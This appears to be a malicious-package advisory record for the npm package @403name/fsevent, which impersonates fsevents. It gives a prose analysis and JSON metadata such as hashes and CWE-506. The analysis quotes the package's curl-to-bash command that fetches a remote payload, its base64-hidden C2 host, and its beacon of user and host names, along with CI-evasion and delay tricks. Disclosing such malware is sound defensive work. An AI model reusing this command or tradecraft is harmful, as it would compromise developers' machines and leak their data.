-= Per source details. Do not edit below this line.=-
On require(), index.js runs an IIFE that gates to macOS, skips when CI or GITHUBACTIONS is set, waits 30-90 seconds, and writes a one-shot marker at ~/.cache/.nyx-npm/f. It then spawns /bin/sh to (1) GET https://k7xm9q.xyz/api/clickfix-callback with URL-encoded query parameters bid, user (process.env.USER), host (os.hostname()), and the literal tag npmfsevent — a beacon identifying the infected machine — and (2) execute curl -sSfL https://k7xm9q.xyz/api/payload/ | /bin/bash & disown, fetching and shell-executing attacker-controlled code with the developer's privileges. The C2 host is hidden behind atob('aHR0cHM6Ly9rN3htOXEueHl6') to evade keyword scanning. The package name @403name/fsevent and its description ("Native filesystem event watcher for Node.js — lightweight FSEvents wrapper with fallback polling") impersonate the well-known fsevents package to lure developers into installing and importing it. The combination of obfuscated C2, CI evasion, randomized delay, one-shot persistence marker, host-identifier exfiltration, and pipe-to-bash remote execution is unambiguous malicious tradecraft.
{
"malicious-packages-origins": [
{
"versions": [
"1.0.1"
],
"id": "IN-MAL-2026-005448",
"import_time": "2026-06-11T03:48:52.63582822Z",
"modified_time": "2026-06-11T03:14:59Z",
"sha256": "2f86ca4502cc824c3684e8f1e08b088b974b4339829461b50d45e3fbc6f808eb",
"source": "amazon-inspector"
},
{
"sha256": "a29e56279c83c00ea2d5d9347dc9741954a596deefd3319185d318593a5c7239",
"id": "IN-MAL-2026-005451",
"import_time": "2026-06-11T03:48:53.000305456Z",
"modified_time": "2026-06-11T03:15:19Z",
"versions": [
"1.0.0"
],
"source": "amazon-inspector"
}
]
}{
"evidence_files": [
{
"tlsh": "919163d85af73160566362bd4b2fa909317fc1b3090cee94b55d9ac92f50f14039aef8",
"sha256": "0edb1fe1a1b96ac8315d1aad997dcbcf49b852a91fe76bddc2cc24e18f1338f3",
"path": "index.js"
},
{
"sha256": "092e258a50b32f3fcc77288c5a066d6b4dd78580ed470c6936d05780f43299f9",
"tlsh": "9c014932c5256c630ecca6995f6a12837231589b5806bc0477d75c2ccb8d66b12ff1ed",
"path": "package.json"
}
],
"package_integrity": [
{
"filename": "fsevent-1.0.1.tgz",
"hashes": {
"sha512_sri": "sha512-vvAcdLAAwsshqAuilhO/8JCiYcj4kVqa+UYT3xMhQe3wlewHV7rQZPP2E2h4MgWn/xpVu/D0aqvaI9pFIQbtlQ==",
"sha1": "28fea122481bb1c8a6a18538d100d11088fe2c50"
}
}
]
}
[
{
"name": "Embedded Malicious Code",
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature."
},
{
"name": "Embedded Malicious Code",
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature."
}
]
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@403name/fsevent/MAL-2026-5549.json"